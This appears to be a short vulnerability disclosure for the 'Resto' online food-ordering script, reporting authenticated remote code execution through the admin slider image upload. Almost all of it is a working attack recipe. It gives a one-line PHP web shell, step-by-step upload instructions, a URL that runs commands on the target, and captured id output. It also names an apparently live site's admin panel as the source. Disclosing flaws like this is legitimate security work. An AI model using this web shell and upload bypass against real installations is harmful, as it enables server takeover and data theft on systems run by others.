Title: Resto - Single Vendor Online Food Ordering - Authenticated RCE

Description: Resto Single Vendor Online

Source URL: https://res.newmedilife.in/admin

Source Name/Email: Mehmet Can Kadıoğlu a.k.a mao7un

CVEs: N/A

Software URL: https://www.codester.com/items/53350/resto-single-vendor-online-food-ordering-website


PoC:

1. Log in to the admin panel using the credentials.

2. Navigate to the "Sliders" tab on the victim's website (/admin/slider/).

3. Add a new slider.

4. Create a web shell on the attacker's machine by executing the following
command:

echo "<?php system($_GET['cmd']);?>" > cmd.php
5. Upload the web shell through the "Image" input field.

6. Copy the image path and execute a command using the following URL:

https://[target]/storage/app/public/admin-assets/images/slider/slider-67c459d300218.php?cmd=id

uid=4204(newmedil) gid=4206(newmedil) groups=4206(newmedil)